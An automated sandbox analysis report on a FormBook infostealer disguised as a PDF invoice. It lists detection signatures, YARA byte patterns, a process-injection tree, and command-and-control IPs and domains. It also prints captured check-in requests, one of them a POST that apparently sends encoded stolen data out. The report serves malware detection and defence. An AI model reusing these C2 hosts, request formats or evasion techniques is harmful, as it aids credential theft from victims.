Windows Analysis Report
ORIGINAL INVOICE COAU7230734298.pdf.exe

Overview

General Information

Sample name: ORIGINAL INVOICE COAU7230734298.pdf.exe
Analysis ID: 1523775
MD5: 7d3ee1a73d9fbef171c785801ffcaff2
SHA1: 2ad9a95c9038e4d61c6d9cbee63746454454d502
SHA256: 1897d47010a97079de62b957827fbecbdb4690ead4a51417fa6f1dccfc19f6c5
Tags: exeuser-ngokoptmp
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ORIGINAL INVOICE COAU7230734298.pdf.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" MD5: 7D3EE1A73D9FBEF171C785801FFCAFF2)
    • ORIGINAL INVOICE COAU7230734298.pdf.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe" MD5: 7D3EE1A73D9FBEF171C785801FFCAFF2)
      • fFUkGixTNm.exe (PID: 3492 cmdline: "C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RpcPing.exe (PID: 7964 cmdline: "C:\Windows\SysWOW64\RpcPing.exe" MD5: F7DD5764D96A988F0CF9DD4813751473)
          • fFUkGixTNm.exe (PID: 4248 cmdline: "C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27c3e:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xff0d:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2b9d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13c9f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2ed03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16fd2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x161d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", CommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", CommandLine|base64offset|contains: N !, Image: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, NewProcessName: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, OriginalFileName: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe", ProcessId: 7276, ProcessName: ORIGINAL INVOICE COAU7230734298.pdf.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-02T02:06:28.163634+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56825 | 85.159.66.93 | 80 | TCP
2024-10-02T02:06:30.710433+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56826 | 85.159.66.93 | 80 | TCP
2024-10-02T02:06:33.257293+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56827 | 85.159.66.93 | 80 | TCP
2024-10-02T02:06:41.993230+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56829 | 185.106.176.204 | 80 | TCP
2024-10-02T02:06:44.549267+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56830 | 185.106.176.204 | 80 | TCP
2024-10-02T02:06:47.089054+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56831 | 185.106.176.204 | 80 | TCP
2024-10-02T02:06:56.491974+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56833 | 52.223.13.41 | 80 | TCP
2024-10-02T02:06:58.051773+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56834 | 52.223.13.41 | 80 | TCP
2024-10-02T02:07:00.520885+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56835 | 52.223.13.41 | 80 | TCP

AV Detection

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, Virustotal: Detection: 38%
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ReversingLabs: Detection: 28%
Source: Yara match, File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, Joe Sandbox ML: detected
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: C:\Windows\SysWOW64\RpcPing.exe, Code function: 8_2_0327C000 FindFirstFileW,FindNextFileW,FindClose,8_2_0327C000
Source: C:\Windows\SysWOW64\RpcPing.exe, Code function: 4x nop then xor eax, eax 8_2_03269B70
Source: C:\Windows\SysWOW64\RpcPing.exe, Code function: 4x nop then mov ebx, 00000004h 8_2_03D304DE
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe, Code function: 4x nop then pop edi 9_2_058C2FA0
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe, Code function: 4x nop then xor eax, eax 9_2_058C7839
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe, Code function: 4x nop then pop edi 9_2_058D2ACE

Networking

Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56830 -> 185.106.176.204:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56834 -> 52.223.13.41:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56825 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56835 -> 52.223.13.41:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56827 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56833 -> 52.223.13.41:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56829 -> 185.106.176.204:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56831 -> 185.106.176.204:80
Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56826 -> 85.159.66.93:80
Source: DNS query: www.kartal-nakliyat.xyz
Source: Joe Sandbox View, IP Address: 52.223.13.41 52.223.13.41
Source: Joe Sandbox View, ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: Joe Sandbox View, ASN Name: AS_LYREG3FR AS_LYREG3FR
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
  GET /pyhp/?5lFl=AhoHbVV8w8Fhov&-L=acxrSkAeFAn+c73u09IRBa4IAQi5A1z7ZI6dwDB31LKHDk9U9aCGF5xgW/dUXTEZ5HtK9ZQYYeKWJ5O00arwvLVjsQ/IAPNwWm6am1xvCJN+TihMUZXrkzI= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  Host: www.yippie.world
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
  GET /n8ew/?-L=YrE+HYcRTJ/OeXavXWmi0WsMxqp/Qj1TC8eaJJaWkX68lODBlWDwQ18bVJjKs/Cf7bGV7reziuqKeQkAFQFGt8cheHN72b7qcqvkvKEYShiE16kKqs7vQFQ=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  Host: www.kartal-nakliyat.xyz
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
  GET /c6mm/?-L=605lt7jFydoU7JlJmLmlR3MPZVvrIrf93PMCsOoFpo6XmjZ52y5IXJzTkSO6xf5k8c4UHFGKgBYSwhM4U1695pryhegOugHUsMzW6k0CmFF9ZZ6niG5/hdc=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  Host: www.sidqwdf.fun
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic, HTTP traffic detected:
  GET /sfpe/?-L=sfhD9ka1f7Zl+qNrDMj9KQZnnhuUSPArAKQ60GHQT7zGoqr1MFveBg7/TQ1R28eaU1mFht6SOS1vYGyl5v5sWa+Vgmcag1rYJ6bZGh78paZg7QH5mUVjdRg=&5lFl=AhoHbVV8w8Fhov HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Language: en-us
  Connection: close
  Host: www.resellnexa.shop
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
Source: global traffic, DNS traffic detected: DNS query: www.yippie.world
Source: global traffic, DNS traffic detected: DNS query: www.kartal-nakliyat.xyz
Source: global traffic, DNS traffic detected: DNS query: www.sidqwdf.fun
Source: global traffic, DNS traffic detected: DNS query: www.resellnexa.shop
Source: unknown, HTTP traffic detected:
  POST /n8ew/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-us
  Connection: close
  Cache-Control: max-age=0
  Content-Length: 199
  Content-Type: application/x-www-form-urlencoded
  Host: www.kartal-nakliyat.xyz
  Origin: http://www.kartal-nakliyat.xyz
  Referer: http://www.kartal-nakliyat.xyz/n8ew/
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)
  Data Ascii: -L=VpseEu0Le7StXxKfNhik5nx++ZgIRSxCSdiOR82VvmGHveO3pBT7RXc+c9vTioOExp/UmLiKq5qidVFVEgdb4LQtLDkm7KPFUq2b17EMbgykw58BtK/3IQ2uTP1RVz8+GcDnHTlJs2qdA1bOjwuW9LiF3GPk2JkgrY/jYZdh5ou+maEaUNqMAxyLkgCdzQOkrQ==
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.14.1
  Date: Wed, 02 Oct 2024 00:06:34 GMT
  Content-Length: 0
  Connection: close
  X-Rate-Limit-Limit: 5s
  X-Rate-Limit-Remaining: 19
  X-Rate-Limit-Reset: 2024-10-02T00:06:39.8601907Z
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.26.1
  Date: Wed, 02 Oct 2024 00:06:41 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 555
  Connection: close
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.26.1
  Date: Wed, 02 Oct 2024 00:06:44 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 555
  Connection: close
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.26.1
  Date: Wed, 02 Oct 2024 00:06:46 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 555
  Connection: close
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.26.1
  Date: Wed, 02 Oct 2024 00:06:49 GMT
  Content-Type: text/html; charset=utf-8
  Content-Length: 555
  Connection: close
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory:
  http://www.ascendercorp.com/typedesigners.htmlru-ru
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory:
  http://www.apache.org/licenses/LICENSE-2.0
  http://www.carterandcone.coml
  http://www.fontbureau.com
  http://www.fontbureau.com/designers
  http://www.fontbureau.com/designers/?
  http://www.fontbureau.com/designers/cabarga.htmlN
  http://www.fontbureau.com/designers/frere-user.html
  http://www.fontbureau.com/designers8
  http://www.fontbureau.com/designers?
  http://www.fontbureau.com/designersG
  http://www.fonts.com
  http://www.founder.com.cn/cn
  http://www.founder.com.cn/cn/bThe
  http://www.founder.com.cn/cn/cThe
  http://www.galapagosdesign.com/DPlease
  http://www.galapagosdesign.com/staff/dennis.htm
  http://www.goodfont.co.kr
  http://www.jiyu-kobo.co.jp/
  http://www.sajatypeworks.com
  http://www.sakkal.com
  http://www.sandoll.co.kr
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory:
  http://www.resellnexa.shop
  http://www.resellnexa.shop/sfpe/
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
            Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RpcPing.exe, 00000008.00000003.2428440920.00000000084B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            Source: Yara match, File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
            Source: initial sample, Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD1D5A3_2_01AD1D5A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADFCF23_2_01ADFCF2
